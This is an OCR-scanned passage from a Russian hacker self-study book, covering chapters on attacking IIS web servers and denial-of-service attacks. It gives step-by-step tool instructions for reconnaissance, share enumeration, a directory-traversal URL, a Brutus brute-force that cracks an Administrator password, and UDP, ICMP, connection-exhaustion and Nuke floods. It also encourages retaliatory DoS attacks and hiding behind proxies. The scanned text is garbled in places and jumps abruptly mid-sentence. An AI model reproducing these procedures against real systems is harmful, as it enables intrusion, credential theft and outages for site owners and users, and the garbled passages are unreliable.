Unix), но легче и проще обратиться к Web-сайтам организаций, предоставляющих бесплатный сервис whois прямо со своих Web-страничек.

£азы данных Whols
Вначале обсудим первую возможность. Каждая компания, желающая получить собственное доменное имя в Интернете, обязана зарегистрировать свою локальную
сеть в специальной уполномоченной организации. До 1999 года такое право имела
единственная организация — Network Solution (http://www.networksolution.com),
но теперь услуги по регистрации сетей предоставляет множество других организаций, например, InterNic (http://www.internic.net). Сайты этих организаций содержат открытые базы данных со сведениями о зарегистрированных организациях и/или ссылки на другие сайты с подобной информацией.
Пользуясь сервисами таких Web-сайтов, которые часто называются серверами
Whois (серверы «Кто есть Кто»), можно получить весьма подробные сведения об
информационной системе организации. Хакер может запросить у сервера Whois
все доменные имена Интернета, зарегистрированные организацией, телефон и

119

Самоучитель хакера
адрес электронной почты администратора домена, имена и адреса серверов DNS
сети. В лучшей Европейской базе данных такого рода, принадлежащей центру
RIPE NCC (Network Coordinate Center — Центр сетевых координат), содержатся
сведения о диапазоне IP-адресов зарегистрированных сетей вместе с личными
данными их администраторов. Все эти данные можно запросить с помощью весьма удобного интерфейса Web-страницы центра RIPE NCC (http://www.ripe.net),
представленной на Рис. 8.1.
t @ T 1
Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^

El ^Пароход |

Рис. 8.1. Web-страничка центра RIPE NCC
для поиска сведений об организации по IP-адресу ее Web-сайта
Что же будет делать взломщик со всей этой информацией? Получив предварительные сведения о локальной сети организации — ГР-адрееа подключенных к
Интернету узлов сети и серверов DNS сетевых доменов — он продолжит изучение сети путем сканирования и инвентаризации сервера.

Сканирование и инвентаризация сервера
Для выполнения этой задачи существует множество утилит, одной из лучших
считается утилита SuperScan (http://www.foundstone.com), диалог которой
приведен на Рис. 8.2.
Чтобы воспользоваться утилитой SuperScan, выполните такие шаги.
> В поле Start (Старт) введите начальный ГР-адрес сканируемой сети.
> В поле Stop (Стоп) введите конечный адрес сканируемой сети.
>• В группе элементов управления Scan type (Тип сканирования) установите
переключатель All list ports from (Все перечисленные порты в диапазоне).
> Щелкните на кнопке Start (Пуск).

120

Хакинг Web-сайтов

Timeout
StarlfTMT
Stop|l.0.0.5

0 Ignore IP zero
0 Ignore IP 255
П Extract from He

P’ng
|400

|

П Resolve hoslnames
121 Only scan responsive pings
[3 Show host responses

Conned

О Ping only

|2000 |

О Every port in lisl

5ИЯИИИ EZB
Ш

О All selected ports in list
Read
14000 I

(5 All list poets from
О All ports from

Рис. 8.2. Сканирование сети выявляет все открытые порты
и запущенные службы
В поле внизу диалога SuperScan отобразятся результаты сканирования. Как видим, на компьютере с IP-адресом 1.0.0.1 открыт порт протокола HTTP и запущен сервер IIS 5.0, так что мы получили нужный результат — наличие в сети сервера Web. И хотя мы экспериментируем в нашей локальной интрасети (чтобы
никого не обидеть), процедура получения этих сведений в Интернете выполняется
подобным образом.

6 shares found on 1 remote hosts.

wa-

M.0.0.1SMy Documents
M.O.(mNETLOGON
M.0.0.1\D
M.0.0.1\Tesl
М.СЩПМу Downloads
M.0.0.1\SYSVOL

1.0.0,1
My Documents
NETLOGON
D
Tesl
My Downloads
SYSVOL

Map Drive

Рис. 8.З. Инвентаризация ресурсов найденного сервера IIS 5
121

Самоучитель хакера
Инвентаризацию общих ресурсов найденного сервера можно выполнить с помощью чрезвычайно популярной программы Legion (http://packetstormsecurity.org/
groups/rhinoS), результат применения которой к найденному хосту
с ГР-адресом 1.0.0.1 представлен на Рис. 8.3.
Теперь, зная о наличии по данному ГР-адресу сервера IIS 5, нас сразу же начинает
интересовать вопрос — можно ли взломать доступ к этому серверу, и каким образом? Обсудим эту тему поподробнее.

се|рвера II5
Хакинг сервера IIS базируется на уязвимостях программных средств сервера,
основанных на протоколах HTTP (Hypertext Transfer Protocol — Протокол передачи гипертекста) и CGI (Common Gateway Interface — Общий шлюзовой интерфейс), а также на уязвимых сценариях сервера IIS, открывающих доступ к ресурсам серверного компьютера.
Протокол HTTP описан, например, в [12], и его функция — обеспечение взаимодействия сервера и клиента Web при запросе и получении текстовой информации. Для этого протокол HTTP предоставляет несколько методов,
основным из которых является метод GET. Когда Web-браузер запрашивает у
сервера информационный ресурс (скажем, текстовый файл), он использует
метод
GET,
одновременно
указывая
адрес
ресурса,
например,
http://www.anyserver.com/documents/order.html. Этот адрес указывает на файл
order.html в каталоге /documents сервера IIS, которому соответствует каталог
локальной файловой системы c:\inetpub\wwwroot\documents.
Протокол CGI описан, например, в [12], и он регламентирует удаленные вызовы
серверных сценариев со стороны клиентов. Вызовы сценариев выполняются с
помощью запросов протокола HTTP, которые имеют такой вид:
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
Здесь MyScript — это название сценария, хранящегося в папке /scripts сервера IIS, a
запись ?Параметр1+Параметр2 определяет фактические параметры, передаваемые
серверному сценарию MyScript. Сервер IIS определяет, что поступивший запрос
предназначен для обработки сценарием, после чего запускает программу сценария,
передает ей параметры и выполняет передачу результатов запроса клиенту.
Кроме протокола CGI, для работы со сценариями используются технологии ASP
(Active Server Pages — Активные страницы сервера) и ISAPI (Internet Server
Programming Interface — Программный интерфейс сервера Интернет). В технологии ASP вызов сценариев выполняется такой строкой запроса:
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =Значение1&Параметр2=
Значение2

122

Хакинг Web-сайтов
В результате исполняется сценарий MyScript.asp, который, как правило, генерирует новую страницу HTML. Интерфейс ISAPI предоставляет возможность
удаленного вызова функций, хранимых в библиотеках ISAPI. Вызов этих функций выполняется по такому запросу HTTP:
http://www.anysite.com/isapi.с111?Переменная1&Переменная2
Теперь, узнав некоторые сведения о работе сервера IIS, посмотрим, чем они могут помочь работе хакера.

ХакиигИГГГ
Протокол HTTP позволяет хакерам достичь много, поскольку его поддержка
сервером IIS не отличается надежной защитой от попыток несанкционированного доступа. В ранних версиях IIS 2.0 достаточно было ввести такой адрес:

http://www.anysite.eom/.7.7.7.7.7winnt/secret.file
чтобы загрузить с Web-сервера информацию, содержащуюся в файле secret.txt.
Это — пример ошибки в реализации системы защиты Windows, хранящей разрешения на доступ к информационным ресурсам в списках ACL. В более новых
версиях IIS эта ошибка исправлена, но ее можно найти у Web-серверов других
производителей [3]. А взамен описанной уязвимости в последних версиях IIS
имеются другие, и их список непрерывно пополняется, что можно видеть по сообщениям на сайтах, посвященных информационной безопасности, например,
SecurityLab.ru (http://www.securitylab.ru).
Чтобы исследовать такого рода уязвимости IIS, очень удобно использовать
утилиту netcat (http://www.atstake.com), (netcat — это очень мощный инструмент — недаром авторы [3] называют netcat основным орудием хакинга IIS).
Проиллюстрируем использование netcat для атаки на сервер Sword-2000 нашей
экспериментальной сети, к услугам которой мы прибегаем на протяжении всей
книги. Для использования netcat в наших целях выполните такую процедуру.
>• Запустите из командной строки компьютера Alex-З утилиту netcat, выполнив
команду nc -vv 1.0.0.1 80.
v После появления сообщения об открытии соединения с сервером введите
строку GET / HTTP/ 1.0 и два раза нажмите клавишу 1Еп1ег1. Результат представлен на Рис. 8.4.
Запрос GET / HTTP/1.0 по умолчанию запрашивает файл из корневого каталога
сервера IIS. Как видно из Рис. 8.4, в ответ получен файл с кодом HTML, загрузка
которого в браузер воспроизведет сообщение об ошибке.

123

Самоучитель хакера
ic-MCommand Piompl
c:\test\netcat>nc -vv 1.0.0.1 80

fud/reu nisnatch: SUORD-20UO !=
| DNS
SUORD-2000 tl.0.0.1] 80 open
GET

/

HTTP

suord-2000.suoi-d.net

/1.0

HTTP/1.1 400 Bad Request

Seruer: M i c r o s o f t — I I S / S . 0
Date: Fri, 28 Feb 2003 12:55:40 GHI
Content-Type: t e x t / h t n l
Content-Length: 87
itml>ErrorThe parameter
sent 17, rcud 224: NOISOCK
C:\test4netcat>

Puc. 8.4. Запрос GET к серверу IIS из утилиты netcat
Чтобы облегчить себе жизнь, можно передавать запросы GET другим способом конвейеризовав ввод данных в командной строке с помощью атрибута • Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 (Рис. 8.20) и наблюдайте за сообщениями и линейным индикатором внизу диалога. Результат представлен в диалоге Brutus — АЕ2 на Рис. 8.22.

140

Хакинг Web-сайтов
^^^^11 X Brutus — AET2 — www.hoobie.net/brulu: — (January 2000)
File

Tool»

Target |1. 0.0.1
.
I
1

Port 1 30

Method

I

(HEAD

PI

Type I HTTP (Basic Auth] |-| | Start

10 Timeout

Connections В^рШ

0 Use Username
U sell D

НШЗОШ

Help

10

Stop | Clear

П Use Proxy [ Define |

0 KeepAlive

Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |

0 Single Usei

[Administrator

|Biw«*|

Рак

Fife

lwrdi.txt

||Вг«к«|

Positive Authentication Results
Target
1.0.0.1/

1 Type
1 Username
HTTP (Basic Auth)
Administrator

1 Password
007

1

Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992

тшшштшншш ^* **• **«« ^ ^.™

992

||U:Adrniriistrator P:000

||58 Attempts per second

||ldle

/f

Puc. 8.22. Пароль доступа к IIS взломан!
Теперь, когда при обращении к взломанному серверу IIS отобразится диалог запроса пароля, представленный на Рис. 8.23, вы будете знать, что туда следует
вводить.

Puc. 8.23. Введите в поля диалога найденные логин и пароль и отобразится защищенная страничка Web
Кроме описанной возможности взлома базовой системы аутентификации, программа Brutus позволяет взламывать парольную защиту, реализованную с помощью форм на страничках Web. Такая система защиты функционирует на основе запросов CGI-сценариев Web-сайта. Выбрав в поле Туре (Тип) пункт HTTP
(Form) (HTTP (Форма)) и настроив передачу запросов GET сценариям, можно

141

Самоучитель хакера
подобрать пароль доступа к ресурсу, воспользовавшись теми же методами, что и
описанный выше способ взлома грубой силой, или выполнить словарную атаку.

Заключение
Сайты Web, поддерживаемые на подключенных к Интернету серверах корпоративной сети, — это наилучшие объекты для удаленного взлома доступа к информационным ресурсам организации. Для хакинга сайтов Web создано множество
утилит, часть из которых описана в этой главе. Следует однако учесть, что задача хакинга такой системы вовсе не так проста, как это может показаться на первый взгляд. Если раньше, в доисторическую эпоху систем Windows NT/95/98,
достаточно было отсканировать Web-сайт программами типа CGI Vulnerability
Scan или D@MNED CGI Scanner 2.1, найти несколько уязвимых сценариев, а
потом с помощью эксплойтов, в изобилии представленных на хакерских Webсайтах, без всяких проблем взломать доступ к ламерскому серверу, то нынче все
это усложнилось.
Чтобы взломать настоящий, защищенный Web-сайт, приходится долго подыскивать ключики к его уязвимостям, причем еще не факт, что удастся найти надежные эксплойты для проникновения в сервер через найденную дыру в системе
защиты. Так что наилучший способ хакинга сайтов Web — это внимательное отслеживание новейших уязвимостей и самодельное изготовление эксплойтов,
чаще всего представленных на Web-сайтах в виде исходных текстов программ.
Антихакер же должен помнить, что ныне имеется множество мощных программных средств исследования безопасности Web-сайтов — например, приложение Retina, описание которого можно найти, например, в [7]. Другая возможность создания надежной защиты Web-сайта — это испытание его на прочность
с помощью хакерских утилит, а для этого антихакер должен в совершенстве овладеть методикой их использования.

142

Г Л А В А 9.

UoS
Сразу после появления и массового распространения сетей, построенных на основе стека протоколов TCP/IP, хакеры занялись разработкой средств для выполнения в сетях TCP/IP действий, которые можно назвать настоящим кибертерроризмом. Эти действия, при всем их разнообразии, сводятся к одному — атакам,
направленным на разрушение или нарушение нормального функционирования
различных сетевых сервисов и называемых атаками DoS (Denial of Service Отказ в обслуживании). Технически атаки DoS реализуются с помощью программ-эксплойтов, использующих уязвимости стека протоколов TCP/IP и сетевого программного обеспечения.
Атаки DoS представляют собой сущее бедствие для современных сетевых компьютерных систем, в особенности для Интернета. Ежегодно атаки DoS опустошают ресурсы различных сайтов Интернета, среди которых присутствуют такие
известные сайты, как Yahoo, eBay, CNN.com, www.Microsoft.com, приводя к
финансовым потерям их хозяев, исчисляемых миллионами долларов [3].
Как правило, следствием таких атак является выход из строя серверов Интернета
из-за перегрузки, что приводит к недоступности услуг этих сайтов и, следовательно, к потере возможных доходов.
Причины применения атак DoS могут быть самыми различными, начиная от
простого хулиганства и кончая самым настоящим кибертерроризмом, имеющим
своей целью достижение, в том числе, определенных политических целей.
Тем не менее, как справедливо указано в [3], для настоящего хакера атаки DoS
не представляют особого интереса, вследствие их очевидной никчемности с точки зрения доступа к информации. Мы, однако, не будем обсуждать цели, преследуемые «кул хацкерами», выполняющими атаку DoS против первого попавшегося им под руку Web-сайта; заметим только, что для антихакера атаки DoS
иногда становятся единственным средством защиты от нападений из сети. В самом деле, когда сразу с нескольких компьютеров на вас направляется целый
шквал сетевых пакетов, защититься от него можно только одним способом — послав в ответ «залп» из сетевого «орудия», представляющего собой аналог хакерского инструмента для атаки DoS.
В данном случае уместно напомнить, что деяния типа атаки
DoS никак не могут понравиться ее жертвам, что может иметь
для хакера самые печальные последствия. Так что даже применяя атаку DoS против надоедливых киберхулиганов, помните,
что нелишне предпринять те же меры защиты, что используют
хакеры, — работайте через прокси-сервер и под защитой брандмауэра или системы IDS (например, BlacklCE Defender
(http://blackice.iss.net/)), чтобы избежать раскрытия конфиденциальности и возможной реакции объектов атаки.

Самоучитель хакера
В этой главе мы вначале рассмотрим общую классификацию атак DoS, а потом
рассмотрим разновидности этих атак вместе с некоторыми программами, вошедшими в классический набор инструментов хакинга.

Разновидности атак’РоЗ
Целью атаки DoS является приведение компьютерной системы в состояние,
когда ее функционирование становится невозможным. Технически реализация
такой задачи может быть выполнена различными методами, поэтому чтобы было легче ориентироваться, мы разобьем атаки DoS на такие категории.
• Атаки насыщением полосы пропускания — отсылая на атакуемый хост большое число пакетов, хакер перенасыщает полосу пропускания определенной
сети, скажем, Интернета (так был неоднократно атакован Web-сайт Yahoo).
Такую атаку хакер может выполнить двояким образом. Если хакер использует сетевое подключение с большой полосой пропускания, скажем, Т1 (ширина 1544 Мбит/с), то ему ничего не стоит затопить пакетами сетевое соединение с полосой пропускания, скажем, 56 Кбит/с (модемное подключение).
Другой вариант — использование усиливающей сети, когда хакер использует
не слишком быстрый канал связи, например, модемное соединение. В этом
случае с помощью определенной технологии хакер посылает поток пакетов
на атакуемый хост сразу со всех компьютеров усиливающей сети.
• Атаки на истощение ресурсов — отсылая на атакуемый хост специально подготовленные пакеты, хакер вынуждает атакуемый компьютер тратить свои
ресурсы на обработку этих пакетов. Происходит захват системных ресурсов
атакуемого компьютера — центрального процессора, памяти и других, после
чего хост выходит из строя.
• Атаки некорректными сетевыми пакетами — отсылая на атакуемый хост особым образом искаженные пакеты, хакер нарушает работу сетевого программного обеспечения или операционной системы компьютера. В таких атаках
используются уязвимости, связанные с ошибками в коде программных
средств.
• Атаки фальсифицированными сетевыми пакетами — искажая сетевые пакеты,
хакер принуждает хост изменить конфигурацию или состояние атакуемой
компьютерной системы, что снижает ее производительность или даже приводит к некорректной работе хостов. Такие атаки основываются на уязвимостях
или плохой настройке системы защиты.
Опишем подробнее атаки DoS перечисленных разновидностей, проиллюстрировав их примерами атак, ставших «классикой» этой разновидности хакинга.

144

Атаки DoS

Агтаки насыщением полосы пропускания
Чтобы переполнить полосу пропускания линии связи атакуемого хоста, хакер
должен принять во внимание возможности своего собственного сетевого соединения. Если хакерский компьютер напрямую подключен к Интернету через соединение Т1, то ему вполне по силам в одиночку «завалить» любой Web-сайт [3], не говоря уже о клиентах, работающих через модемные подключения. Выполнив лавинообразное генерирование пакетов, хакер заполняет ими линию связи атакуемого
хоста, после чего работа

атакованного хоста в сети становится невозможной.
Для выполнения такой атаки существует множество инструментов, использующих различные сетевые протоколы. Рассмотрим работу двух, весьма популярных программ — флудеры UDP и ICMP.
Все примеры атак DoS, рассмотренные в этой главе, будут иллюстрироваться на экспериментальной локальной сети, которую мы использовали в предыдущих главах для описания атак на
службы электронной почты и /СО. Автор категорически отвергает всякую возможность использования этой информации для
выполнения реальных атак со своего компьютера и предупреждает о возможной ответственности.

Как явствует из названия, флудер UDP должен «затоплять» атакуемого клиента
пакетами UDP, нарушая работу компьютера. Весьма удобной программой, реализующей такую атаку DoS, можно назвать утилиту UDP Flooder 2.0 компании
Foundstone (http://www.foundstone.com), которая, вообще-то говоря, была создана для проверки устойчивости хостов к атакам такого рода.
На Рис. 9.1 представлен диалог программы UDP Flooder 2.O.
Чтобы проиллюстрировать работу утилиты UDP Flooder 2.0, мы воспользуемся
нашей экспериментальной сетью и выполним атаку DoS на компьютер А1ех-3
с IP-адресом 1.0.0.5 с помощью такой последовательности действий.
> Запустите утилиту UDP Flooder 2.O.
у В поле IP/hostname (IP/имя хоста) введите IP-адрес или имя NetBIOS атакуемого компьютера — в данном случае введен IP-адрес 1.0.0.5.
> В поле Port (Порт) введите номер порта, в данном случае введен порт 80, поскольку его используют HTTP-серверы.

145

Самоучитель хакера
UDP Flondfir 2 ПО

ВВЕЗ1

IP: 1.0.0.1

^ __. 11011
.

IP/hostname |1. 0.0.5

|
Т

Max duration (sees)

Port [30

|

II

^Infinite] |

Max packets [[Infinite]

min

|

max

Speed (pkts/sec)

[-[

| 250 |

.

~»V

Modem — >— Cable — >— Tl — >— LAN

© Random
О Text

[20000 | to [30000 | bytes

|

|»—’ UDFFlocH! Server eH’iste

О From file | Brows» 1 1

|
| Go

Packets sent

903

Seconds elapsed

20.299

|

Stop

Puc. 9.1. Подготовка атаки заливкой пакетов UDP
не займет у вас много времени
Установите ползунок Speed (Скорость) в позицию LAN, поскольку мы исполняем атаку через локальную сеть.
В группе элементов управления Data (Данные) установите переключатель
Random (Случайная генерация),
• Windows Task Manager
что вынудит флудер генериро- £File
Opliont View Help
вать и отсылать на атакуемый
Applications | Processes J Performance | Nettvi^ing [
компьютер случайные данные.
•Sword •
> В ставшие доступными поля
справа от переключателя введите значения, соответственно,
20 000 и 30 000, установив длину передаваемых пакетов.
> Щелкните на кнопке Go (Атаковать).
>• Когда вы сочтете, что с вашей
жертвы достаточно, щелкните на
кнопке Stop (Стоп).
На Рис. 9.2 представлен результат
воздействия атаки на компьютер
Alex-З в виде диалога диспетчера
задач, открытого на вкладке Networking (Сеть).
146

Adapter Name

[[Processes: 39

I Network Utilization I

||CPU Usage: 22%

Link Speed I
10 Mbps

Operatic

[[Commit Charge: 150620K / 47864 J

Puc. 9.2. Атака удалась — сетевое
соединение заполнено пакетами на 80%

Атаки DoS
Как видим, результат неплох — сетевое подключение занято в основном приемом
пакетов UDP, реакция компьютера замедлена и мощности процессора на 50%
заняты обработкой поступающей бессмысленной информации. И все это достигнуто при использовании равноценных подключений — и хакер, и его жертва
подсоединены к LAN типа Ethernet I DBase.

4>лус)ер ICMP
Флудеры (или бомберы) ICMP (Internet Control Message Protocol — Протокол
управляющих сообщений Интернета) очень похож на только что рассмотренный
флудер UDP. На Рис. 9.3 представлен диалог одного из флудеров X-Script ICMP
Bomber.
pt ICMP Bomber vO 3 By Code
Host |1.0.0.5
Packet Size: h ooOOO

\ NumberToSenchhooo

Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs

Рис. 9.З. Флудер X-Script ICMP Bomber весьма прост, но эффективен
Чтобы «зафлудить» неприятельский компьютер, хакеру достаточно в поле Host
(Хост) указать IP-адрес или имя компьютера жертвы, после чего щелкнуть на
кнопке Ping (Пинг). При необходимости, в поле Packet Size (Размер пакета)
можно задать размер пакетов, а в поле Number to Send (Количество пакетов) число отсылаемых пакетов. Размер пакета весьма влияет на эффект применения
флудера — большой размер пакета приводит к практически полному затоплению
сетевого соединения жертвы. На Рис. 9.4 представлен диалог диспетчера задач,
показывающий загрузку сетевого соединения компьютера Alex-З (его IP-адрес
равен, как вы помните, 1.0.0.5).
Атака ICMP особенно эффективна еще и тем, что протокол ICMP (Internet Control Message Protocol — Протокол управляющих сообщений Интернета) предназначен для тестирования работы сети TCP/IP, и пакеты ICMP имеют высокий
приоритет обслуживания. Так что флудеры ICMP могут быть весьма полезным
инструментом разборки со всякого рода персонажами, не дающим прохода
Web-путешественникам; к тому же флудеры ICMP не требуют никаких особенных знаний для их использования.

147

Самоучитель хакера

ааа

Г» Windows Task Managei
File

Options

View

Help

Applications I Processes I Performance I Networking

Processes: 38

||CPU Usage: 5%

\\Commb Charge: 1417Ж / 47864 ^

Puc. 9.4. Атака DoS вполне удачна!

Aht3K3 Smurf
Но что делать, если намечаемая жертва подключена к сети через быстрое соединение, а хакер не имеет доступа к достаточно мощному подключению, которое
позволит ему выполнить атаку DoS достаточно эффективно? Тогда хакеру следует прибегнуть к более сложной атаке Smurf, которая заключается в следующем.
Вместо того, чтобы отсылать пакеты с хакерского компьютера, в атаке Smurf
используется усиливающая сеть. С хакерского компьютера на широковещательный адрес усиливающей сети посылаются пакеты ECHO (Эхо) протокола ICMP,
которые обычно используются для диагностики сети. В рассылаемых пакетах хакер подменяет исходный адрес пакетов IP-адресом атакуемого хоста, после чего
все компьютеры усиливающей сети посылают ответные пакеты жертвенному компьютеру. Эффект от такой атаки может быть весьма велик, поскольку если усиливающая сеть состоит из нескольких десятков компьютеров, то один ЕСНО-запрос
размером 10 Кбайт может вызвать лавину ответов общим объемом несколько мегабайт, и сетевое соединение атакуемого компьютера просто захлебнется.
Другой, наиболее опасной атакой описываемой разновидности является распределенная атака DoS, или DDoS (Distributed DoS). Суть атак DDoS состоит в помещении на сетевых компьютерах программ-клиентов, работающих под управлением центральной консоли. В определенный момент времени по команде с
хакерской консоли эти клиенты, имеющие выразительное название «зомби»,

148

Атаки DoS
начинают атаку DoS по указанному адресу Интернета. Среди атак DDoS наиболее популярной является WinTrinoo (сайт разработчика находится по адресу
http://www.bindview.com), которая, к тому же, представляет собой единственную реализацию атаки DDoS на платформе Win32. В 2000 году атаками DDoS
были поражены многие серверы Интернета, включая Web-сайты самых известных фирм (этим, наверное, объясняется отсутствие на сайтах хоть скольконибудь работоспособной версии программ, реализующих атаку WinTrinoo).
Для исследования и выявления компьютеров-зомби компания Foundstone предложила программные средства, про которые мы еще поговорим в конце главы,
где обсуждаются меры защиты от атак DoS.

Атаки на истощение ресурсов
Атака DoS, направленная на истощение ресурсов, имеет своей целью захват системных ресурсов атакованного хоста, таких как память, процессор, квоты дискового пространства. Как правило, хакер, предпринимающий данную атаку DoS,
уже имеет доступ к общим ресурсам системы и своими действиями пытается
захватить дополнительные ресурсы, чтобы затруднить доступ к ним других
пользователей. Эти действия могут привести к недоступности сервера для подключений остальных пользователей, зависанию процессов и переполнению дискового пространства.
Одна из наиболее интересных и эффективных атак DoS рассматриваемого типа
реализуется программой PortFuck, которая выполняет атаку переполнением таблицы процессов (еще ее называют флудером TCP-соединений по причинам, которые изложены далее). Утилита PortFuck открывает с хостом-жертвой все новые и новые TCP-соединения до тех пор, пока не переполнит ресурсы атакованного компьютера. Этот момент наступит независимо от мощности процессора,
размера памяти, полосы пропускания линии связи и любых других факторов по
той простой причине, что каждое TCP-соединение требует для открытия ресурсы,
а они, в любом случае, не беспредельны.
На Рис. 9.5 представлен главный диалог утилиты PortFuck.
!.f: PortFuck 1.0Ь2 PRIVATE BUILD
Host: localhost

НШЮ|

]

START

|

Help?

Port:

П Reconnect on Disconnect
Delay (MS): |1 000
[Ready.

|

NICI

PA

Socks: [5

|

Puc. 9.5. Программа PortFuck готова сокрушить свою жертву
149

Самоучитель хакера

Атаки Nuke
Слово «Nuke» на английском языке означает «ядерное оружие», и если такое
название присвоили атакам DoS, то, очевидно, они чего-то, стоят. На русском
эти атаки так и называют — «нюк», и суть классического «нюка» состоит в следующем. В сетях TCP/IP для проверки функционирования хостов применяется
протокол ICMP, про который мы упоминали в разделе «Флудер ICMP» выше.
При возникновении в сети какой-либо ошибки функционирования — обрыва
соединения, недоступности линии связи и т.п. — происходит генерация сообщения ICMP, вслед за которым выполняются определенные действия, например,
перестройка маршрутизации сети исключением линии связи из таблицы маршрутизации. Одновременно разрываются все подключения с компьютером,
ставшим недоступным.
На этом-то и строится расчет хакера — послав компьютеру А, подключенному к
компьютеру В, сообщение, что компьютер В якобы недоступен, можно прервать
соединение. Наибольший эффект такие «шалости» имеют при атаках на ШС и
Web-чаты, поскольку их посетители подолгу остаются подключенными к серверу, и их легко вычислить и «отсоединить» от сервера. Так что атаки Nuke — это
сущее наказание для сетей ШС.
При работе с атаками DoS типа Nuke и хакерам, и антихакерам следует учесть,
что системы Windows 2000/XP не позволяют вытворять с собой такие штучки,
которые без проблем выводят из строя системы Windows 9x. Это подтверждают
как эксперименты по применению «нюков» к компьютерам Windows 2000/XP,
так и литературные источники (например, [4]). Тем не менее, учитывая наличие
в Интернете множества компьютеров Windows 9x, да еще и лишенных всякой
защиты брандмауэрами, не стоит сбрасывать со счетов возможности «нюков».
Для антихакеров «нюки» подчас могут стать той дубиной, которая спасет их
при путешествиях по виртуальным просторам Интернета от персонажей типа
доктора Добрянского.
Существует великое множество утилит для выполнения атак Nuke — все на одно лицо, с очень похожими диалогами. Рабочее окно одной из них, программы
Windows Nuke’eM version 1.1, представлено на Рис. 9.8.
Чтобы выполнить атаку Nuke на компьютеры нашей экспериментальной локальной сети, добавим к ней еще одного клиента — Alex-2, с IP-адресом 1.0.0.4 и
работающего под управлением системы Windows 95. Далее выполним такие шаги.
>• В поле Address (Адрес) рабочего окна программы Windows Nuke’eM version 1.1,
представленном на Рис. 9.8, последовательно введите IP-адреса компьютеров
Alex-2 (Windows 95), Alex-3 (Windows XP) и Alex-1 (Windows 2000). По мере
ввода ГР-адресов щелчком на кнопке Add (Добавить) вносите их в список в
левой части диалога.
152

Атаки DoS

\»\ Eort [щ

Address [1.0,0,7
1.0.0.4
1.0.0.5
1.0.0.7

lext [Testing 1 2 3
JDelay

ft

[-^ П dose after execulio

This program is created by Sadikuz (c) for
test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|

Add

| |Remove! |

Help

I

Execute
Dong

Puc. 9.8. Рабочее окно классического «Нюка» весьма незамысловато
>

Щелкните на кнопке Execute (Исполнить). В окне Windows Nuke’eM version 1.1
отобразится информация о ходе атаки (Рис. 9.9).

НИЖЗэЕ

Windows Nuke’eM — Version 1 . 1
Rle

Help

Address |1. 0.0.7

MEot|l39

1.0.0.4 {Nuked}
1.0.0.5 {Connect error}
1.0.0.7 {Connect error}

К]

lexl |Testing 1 2 3
Delay |o

I

|
^ Q Close after execution

This program is created by Sadikuz (c) for
test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|

Add

| | Remove | |

|

Help

| 1
Execute

I

I

Unable to connect to: 1 .0.0.7

Puc. 9.9. На компьютере Alex-2 следует ожидать неприятностей!
> Чтобы проверить результаты применения «нюка» к компьютеру Alex-2, попробуем обратиться к компьютеру А1ех-2 с помощью проводника Windows.
В ответ проводник Windows отображает диалог, представленный на Рис. 9.10.
Таким образом, связь с компьютером А1ех-2 нарушена — что и требовалось достичь атакой Nuke. Теперь вы понимаете, почему при общении в чатах и всякого
рода IRC-сообществах следует избегать идентификации вашего IP-адреса. Ведь
при работе на компьютерах со старыми системами Windows вы практически ничем не защищены от «нкжов», если, конечно, не используете толковый брандмауэр или систему IDS (рекомендуем BlacklCE Defender).

153

Самоучитель хакера
• Замедление скорости передачи данных — посылая якобы от имени промежуточного маршрутизатора ICMP-сообщение Source Quench (Замедлить источник), хакер принуждает хост снизить скорость передачи данных. Этого же результата можно достичь, посылая ICMP-сообщение Destination Unreachable:
Datagram Too Big (Цель недоступна: датаграмма слишком велика).
Как видим, возможности протокола ICMP для создания атак DoS просто неисчерпаемы, однако следует учесть, что владея такой техникой, хакер может получить гораздо больше пользы, если применит ее для достижения других, более
плодотворных целей, чем для причинения мелких и средних гадостей своим
сетевым соседям.
Напоследок укажем самую, пожалуй, популярную атаку DoS, реализованную в
сетях TCP/IP — атаку на протокол NetBIOS от хакера Sir Dystic, создавшего утилиту nbname, которая искажает работу службы NBNS преобразования IP-адресов в
имена NetBIOS в сетях Windows 2000 [4]. Запустив утилиту nbname, можно полностью нарушить работу всей сети, передавая сообщения NetBIOS об освобождении или регистрации имен NetBIOS. После этого работа сети TCP/IP полностью или частично нарушается — общие ресурсы становятся недоступными, подключения и просмотр сетевых соседей затрудняется, и перестают работать некоторые команды тестирования сети, например, net send.
К сожалению, все попытки обнаружить в Интернете утилиту nbname оказались
тщетными — сайты, указанные ссылками на страницах с описанием атаки утилитой nbname, тщательно заглушены, что наводит на мысль об исключительной
эффективности nbname.

Зашита от атак
Атаки DoS — это бедствие нынешнего виртуального мира, приводящие в хаос
мощные вычислительные системы. Борьба с ними усложняется еще и тем, что
все эти атаки подчас невозможно отразить иначе, кроме как закрытием всех сетевых соединений атакованного хоста, что очень часто неприемлемо по финансовым соображениям. Тем не менее, в [11] отмечается, что иногда выгоднее увеличить мощности компьютерной системы, подверженной атакам DoS, чем закрыть к ней доступ, скажем, остановить работу Web-сервера организации.
Расчет здесь строится на истощение ресурсов атакующей стороны, которой просто не удастся превзойти ресурсы Web-сервера. Другое важное средство защиты — переход на современные операционные системы и программное обеспечение, которое «осведомлено» о последних изобретениях по части атак DoS.
Однако все это может не устоять перед атакой DDoS — хакер, овладевший такими средствами, может стать воистину всемогущим, поскольку нет такого сервера, который мог бы устоять перед атакой, идущей со всех сторон земного шара с

156

Атаки DoS
неопределенно большого числа комьютеров-зомби. Такие атаки требуют особого подхода, и вот что предлагает компания Foundstone.
Вместо настройки системы защиты сервера, усиления ресурсов подверженного
атакам компьютера, т.е. всего того, что в Главе 1 мы назвали «пассивная оборона», специалисты Foundstone предлагают меры активной обороны. В ответ на
атаку DDoS, использующей сотни и тысячи «зомби», Foundstone предлагает самому перейти в наступление и заглушить работу «зомби» встречной атакой.
Для выполнения такой контратаки сотрудник фирмы Foundstone, неутомимый
